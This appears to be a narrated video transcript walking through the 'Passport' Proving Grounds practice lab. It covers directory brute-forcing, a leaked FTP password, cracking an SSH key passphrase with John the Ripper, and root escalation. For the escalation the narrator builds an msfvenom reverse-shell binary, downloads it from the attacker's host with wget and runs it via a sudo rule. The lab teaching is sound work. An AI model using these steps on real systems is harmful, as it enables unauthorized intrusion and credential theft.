Hey everybody, it's Rob. We're back. We're going to do another Proving Grounds practice walkthrough. This time we're doing a machine called Passport. Passport is a Linux machine rated as intermediate. The initial foothold was a pain in the butt, but the rest of it used a lot of techniques that I've seen before, so it wasn't too bad for me. So without further ado, you can see I'm on Offsec VPN, and I do have Passport spun up. The first thing that we did was we ran an mmap scan. 20 is there, but it's closed. 21 is FTP, 22 SSH, and then 80 is running some kind of website. So ultimately, not a lot to work with there, so we went to the website. Now this is one of these cardboard front-end websites. You click all the links and it doesn't do anything. One thing I did note is there's some quotes here from the president and from the CTO, Luigi and Diego, so I noted those down as potential usernames. The only other thing that actually works here is this reserved area, and it really doesn't do anything. I tried to use, all kinds of password combinations and stuff. It was really just a red herring or a rabbit hole. So I did some go busting, and I tried many lists, and I was getting the same things back, and they weren't very helpful. So ultimately, I decided to go with one of the gigantic lists to do the initial go busting. And if you look, it's been running for like 15 minutes, but any list that I used came back with images, CSS, JS, and server status. This is new, this account login. This is a result of me using this directory list 2.3 big.txt, which is part of sec lists. Now, sec lists is not installed on Kali by default, so what you need to do is sudo apt install sec lists. So I did come up with that. And in the meantime, I did try an FTP into the machine. And if I use Diego, you get permission denied. So if I exit and then I try again and I use Luigi, I get a password prompt. So Luigi is probably a valid user, at least on this machine. Obviously, I don't have a password, so there's really not a whole lot we can do there. So I'm just going to close this. So now that I have this account login, I tried to go there. So if we go back to the website and we put account login, we get forbidden. So the next thing I did was to try and go bust inside account login. And I went back to the RAF medium directories because it's much quicker. And there's this trace. Okay, so now if we go to trace, still get forbidden. So then I ran go busting on inside of trace. And the next set of go busting directories that popped up were these numbers. And I think it's in either 46 or 51. I'll show you what happens. So if we put 46 in, we get these messages. And, most of them are not really useful. But let's look and let's see what the 51 and 63. So what we'll do is we'll come back here. We'll put in 51. And bingo, we get a password, this serendipity 1903 @ Now I tried to brute force FTP. That would have never happened. That password, I don't think would have ever come up. So, I wasted some time. Well, I didn't waste it. I just had it run brute force in the background while I was doing other stuff. But as you know, brute forcing FTP is very slow. So I was using, password lists, and it was taking like an hour. So now that we have this password, we actually do have a valid set of credentials. So we're going to open up a terminal and we're going to FTP into the machine, and we're going to FTP in as Luigi. And then what we're going to do is we're going to copy this password, paste it in, and hit enter. So now we have FTP. If I do, one thing I would mention is just type pass. Turns passive mode off, fall back to active mode. If you don't do that, when you try to do an LS or anything like that, or a DIR, it kind of freezes up FTP. I think that has to do with the fact that 20 is closed. But if you just type pass, you'll be fine. Okay. And if you do an LS, there's a ssh.back. So we're going to definitely want to get that ssh.back. So we have that. And then if we go into the uploads directory, I believe there's nothing there. So if I do an LS, there's nothing. So we can exit out of here. and exit. And I'm hoping that ssh.back is an IDRSA key. So we're going to open it in mousepad, and it is in fact a private key. So we're in good shape. So what I'm going to do is I'm going to rename this ID_RSA. And then we're going to open a terminal here. And if we do an ls AIL on IDRSA, we see that it's read write. We have to change it to read only. Otherwise, we'll get an insecure key error. So with chmod 400, which is read only for the owner. Hit that. And then if we do ls AIL again, we can see the key is read only. So now we can try to SSH in as Luigi. And that's just what we're going to do using the identity file. And unfortunately, it comes back with a passphrase, which I don't have. So what we're going to do is we're going to use a tool called John the Ripper. John has a tool that you can use to, I'm just going to hit Control-C, convert SSH keys with passphrases on them into a hash that John can crack. Okay? The tool to use that is SSH to John. And what we're going to do is we're just running it on IDRSA and piping the result to hash.txt. So that will create a file called hash.txt with a hash in it that John can actually try and crack. So we're going to hit enter. And if we cat hash.txt, you can see that's a pretty familiar looking site as far as hashes go. So we'll clear the screen. And then we're going to run John hash.txt word list, and I'm going to use RockU. Now I've already cracked this password, so when I hit enter, it's going to tell me that there's no more passwords left to be cracked. I think it took maybe 2 or 3 minutes to crack with RockU, and I'll show you how to show the password once you have it. Okay, so we hit enter, and it's going to say no password hashes left to crack. Okay, for me, because I've already cracked it. Now all you got to do is type John hash.txt tac show, and the password's flower power. So now we should be able to SSH in as Luigi now that we have that passphrase. Okay, so if we hit enter, it asks for the passphrase flower power, and we have a shell. So we do our normal Linux enumeration always. So it's history, nothing. Step 2 for me is always sudo tac-l. Okay, so this is very interesting. It says Luigi may run the following commands on Passport with no password. Temp base 64 home star. Okay, so what we're going to do is first and foremost, let's go to the temp directory to see what we're working with. And if we do an ls, base 64 is not even there. Okay. If this was the Linux binary base 64 and it was a little less restricted, I would just go right to GTFO bins and see if there was a way I could escalate that way. But what I decided to do this time was to generate an msfvenom payload and transfer a malicious binary over to the machine. So I'm going to open up a new terminal on my attack machine. And you guys have probably seen this a million times. We're running msfvenom. The payload is Linux x86 shell reverse TCP. We're connecting back to my machine on 80. We're creating a Linux executable, which is an ELF file, and we're just calling it base 64. So I'm going to hit enter. All right, now we got to do a Python HTTP server so we can get this file over to the temp directory. Go back to our foothold. We type w get http 192.168.45.159 base 64. Hit enter. Do an ls. Base 64 is there. Now we have to make it executable. Don't forget to do this or it won't work. Chmod plus x for executable permissions on base 64. Now if we do an ls AIL, we can see base 64 is executable. Okay, so now we have to come back to our web browser and we need to kill that and start a netcat listener on 80 because that's what we used in our msfvenom statement. Now, I had a little trouble getting this to work, but what we're going to do is we're going to run this command on, if you look, it says home star, which means we should be able to run it on any file on any directory in the home directory. So I'm going to basically run it on the local.txt, which, speaking of which, I don't think we got that. So we want a cat home Luigi local.txt. And there's the flag. I mean, we could have got it when we were root, but I forgot to do that. So there you go. There's the user flag. So now if we just follow the instructions for the sudo no password, we type sudo, don't forget that, temp base64, which is our malicious base64. Okay. And then we're going to run it on home Luigi local.txt. Now, we have our listener. When I hit enter, we're going to see what happens, okay? Hit enter. We go back to our listener, and we have a shell. So I'm going to type bin bash I and see what happens. And we're root at passport. Fantastic. So now we can do cd root ls cat proof.txt. And there's the flag. So to exploit this machine, the initial foothold was tricky. The website is not much help. I used my normal gobusting lists, and they just weren't cutting it. So I went to the sec lists, the biggest list that they have, and found an account underscore login directory, did some gobusting on that directory, found a trace directory, did some gobusting on that directory, and found a bunch of numbered directories which contained messages, one of which had a password for Luigi. We FTP'd in as Luigi. We grabbed an ssh.back file from the FTP site. We renamed it IDRSA. We put the proper permissions on it. We tried to log in using SSH as Luigi. Unfortunately, there was a passphrase on it. So we used SSH to John to convert that to a hash that John could crack. We cracked the password passphrase using John. We logged in as Luigi using the passphrase. And then we did our normal enumeration. And on step 2, sudo tac-l, we saw that John can run a very specific base64 binary on any file in the home directories. So I created a malicious msfvenom payload called base64. We followed the instructions, did a sudo using that command, and we were able to get a root shell on a listener. And then we were able to get the flag. So overall, it wasn't too bad. I've seen a lot of this before. So for me, this wasn't a very difficult machine. The most difficult part was getting the correct list to find the directories that you needed to find. So I hope you found this video useful. I hope you learned something. All the links, if I used any, will be in the description below. If you have any questions, comments, concerns, you just want to say hi, drop a comment below. I want to thank you guys for watching, and I'll see you all in the next video.